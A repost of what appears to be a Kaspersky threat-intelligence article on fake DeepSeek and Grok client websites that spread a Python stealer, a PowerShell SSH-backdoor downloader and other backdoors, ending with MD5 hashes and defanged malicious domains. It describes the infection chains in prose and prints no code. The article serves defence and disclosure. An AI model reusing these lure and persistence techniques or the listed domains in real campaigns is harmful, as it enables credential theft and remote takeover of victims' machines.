@ Cybersecurity & cyberwarfare

Trojans disguised as AI: Cybercriminals exploit DeepSeek’s popularityIntroduction Among the most significant events in the AI world in early 2025 was the release of DeepSeek-R1 – a powerful reasoning large language model (LLM) with open weights. It’s available both for local use and as a free service. Since DeepSeek was the first service to offer access to a reasoning LLM to a wide audience, it quickly gained popularity, mirroring the success of ChatGPT. Naturally, this surge in interest also attracted cybercriminals. While analyzing our internal threat intelligence data, we discovered several groups of websites mimicking the official DeepSeek chatbot site and distributing malicious code disguised as a client for the popular service. Screenshot of the official DeepSeek website (February 2025)Scheme 1: Python stealer and non-existent DeepSeek client The first group of websites was hosted on domains whose names included DeepSeek model versions (V3 and R1): r1-deepseek[.]net; v3-deepseek[.]com. As shown in the screenshot, the fake website lacks the option to start a chat – you can only download an application. However, the real DeepSeek doesn’t have an official Windows client. Screenshot of the fake website Clicking the “Get DeepSeek App” button downloads a small archive, deep-seek-installation.zip. The archive contains the DeepSeek Installation.lnk file, which holds a URL. At the time of publishing this research, the attackers had modified the fake page hosted on the v3-deepseek[.]com domain. It now prompts users to download a client for the Grok model developed by xAI. We’re observing similar activity on the v3-grok[.]com domain as well. Disguised as a client is an archive named grok-ai-installation.zip, containing the same shortcut. Executing the .lnk file runs a script located at the URL inside the shortcut: This script downloads and unpacks an archive named f.zip. Contents of the unpacked archive Next, the script runs the 1.bat file from the unpacked archive. Contents of the BAT file The downloaded archive also contains the svchost.exe and python.py files. The first one is a legitimate file python.exe, renamed to mimic a Windows process to mislead users checking running applications in Task Manager. It is used to launch python.py, which contains the malicious payload (we’ve also seen this file named code.py). This is a stealer script written in Python that we haven’t seen in attacks before. If it’s executed successfully, the attackers obtain a wealth of data from the victim’s computer: cookies and session tokens from various browsers, login credentials for email, gaming, and other accounts, files with certain extensions, cryptocurrency wallet information, and more. After collecting the necessary data, the script generates an archive and then either sends it to the stealer’s operators using a Telegram bot or uploads it to the Gofile file-sharing service. Thus, attempting to use the chatbot could result in the victim losing social media access, personal data, and even cryptocurrency. If corporate credentials are stored on the compromised device, entire organizations could also be at risk, leading to far more severe consequences. Scheme 2: Malicious script and a million views In another case, fake DeepSeek websites were found on the following domains: deepseek-pc-ai[.]com deepseek-ai-soft[.]com We discovered the first domain back in early February, hosting the default Apache web server page with no content. Later, this domain displayed a new web page closely resembling the DeepSeek website. Notably, the fake site uses geofencing: when requests come from certain IP addresses, such as Russian ones, it returns a placeholder page filled with generic SEO text about DeepSeek (we believe this text may have been LLM-generated): If the IP address and other request parameters meet the specified criteria, the server returns a page resembling DeepSeek. Users are prompted to download a client or start the chatbot, but either action results in downloading a malicious installer created using Inno Setup. Kaspersky products detect it as Trojan-Downloader.Win32.TookPS.*. When executed, this installer contacts malicious URLs to receive a command that will be executed using cmd. The most common command launches powershell.exe with a Base64-encoded script as an argument. This script accesses an encoded URL to download another PowerShell script, which activates the built-in SSH service and modifies its configuration using the attacker’s keys, allowing remote access to the victim’s computer. Part of the malicious PowerShell script This case is notable because we managed to identify the primary vector for spreading the malicious links – posts on the social network X (formerly Twitter): This post, directing users to deepseek-pc-ai[.]com, was made from an account belonging to an Australian company. The post gained 1.2 million views and over a hundred reposts, most of which were probably made by bots – note the similar usernames and identifiers in their bios: Some users in the comments dutifully point out the malicious nature of the link. Links to deepseek-ai-soft[.]com were also distributed through X posts, but at the time of investigation, they were only available in Google’s cache: Scheme 3: Backdoors and attacks on Chinese users We also encountered sites that directly distributed malicious executable files. One such file was associated with the following domains: app.delpaseek[.]com; app.deapseek[.]com; dpsk.dghjwd[.]cn. These attacks target more technically advanced users – the downloaded malicious payload mimics Ollama, a framework for running LLMs such as DeepSeek on local hardware. This tactic reduces suspicion among potential victims. Kaspersky solutions detect this payload as Backdoor.Win32.Xkcp.a. The victim only needed to launch the “DeepSeek client” on their device to trigger the malware, which creates a KCP tunnel with predefined parameters. Additionally, we observed attacks where a victim’s device downloaded the deep_windows_Setup.zip archive, containing a malicious executable. The archive was downloaded from the following domains: deep-seek[.]bar; deep-seek[.]rest. The malware in the archive is detected by Kaspersky solutions as Trojan.Win32.Agent.xbwfho. This is an installer created with Inno Setup that uses DLL sideloading to load a malicious library. The DLL in turn extracts and loads into memory a payload hidden using steganography — a Farfli backdoor modification — and injects it into a process. Both of these campaigns, judging by the language of the bait pages, are targeting Chinese-speaking users. Conclusion The nature of the fake websites described in this article suggests these campaigns are widespread and not aimed at specific users. Cybercriminals use various schemes to lure victims to malicious resources. Typically, links to such sites are distributed through messengers and social networks, as seen in the example with the X post. Attackers may also use typosquatting or purchase ad traffic to malicious sites through numerous affiliate programs. We strongly advise users to carefully check the addresses of websites they visit, especially if links come from unverified sources. This is especially important for highly popular services. In this case, it’s particularly noteworthy that DeepSeek doesn’t have a native Windows client. This isn’t the first time that cybercriminals have exploited the popularity of chatbots to distribute malware: they’ve previously targeted regular users with Trojans disguised as ChatGPT clients and developers with malicious packages in PyPI. Simple digital hygiene practices, combined with a cutting-edge security solution, can significantly reduce the risk of device infection and personal data loss. Indicators of compromiseMD5 4ef18b2748a8f499ed99e986b4087518 155bdb53d0bf520e3ae9b47f35212f16 6d097e9ef389bbe62365a3ce3cbaf62d 3e5c2097ffb0cb3a6901e731cdf7223b e1ea1b600f218c265d09e7240b7ea819 7cb0ca44516968735e40f4fac8c615ce 7088986a8d8fa3ed3d3ddb1f5759ec5d Malicious domains r1-deepseek[.]net v3-deepseek[.]com deepseek-pc-ai[.]com deepseek-ai-soft[.]com app.delpaseek[.]com app.deapseek[.]com dpsk.dghjwd[.]cn deep-seek[.]bar deep-seek[.]rest v3-grok[.]com securelist.com/backdoors-and-s… https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05145826/DeepSeek_malware_01-1024x495.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05150822/DeepSeek_malware_02-1024x416.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05152925/DeepSeek_malware_04.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05153119/DeepSeek_malware_05.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05153658/DeepSeek_malware_11.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/06073527/deepseek-malware-featured-image-990x400.jpg https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05152817/DeepSeek_malware_03.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05153157/DeepSeek_malware_06.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05153222/DeepSeek_malware_07-1024x449.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05153255/DeepSeek_malware_08-1024x784.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05153419/DeepSeek_malware_09-1024x495.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/06075655/7-1024x431.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/06072310/6-1.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/06072322/5-1.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05153909/DeepSeek_malware_14.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05154027/DeepSeek_malware_15-551x1024.jpg https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05145826/DeepSeek_malware_01.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05150822/DeepSeek_malware_02.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05153222/DeepSeek_malware_07.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05153255/DeepSeek_malware_08.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05153419/DeepSeek_malware_09.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/06075655/7.png https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/03/05154027/DeepSeek_malware_15.jpg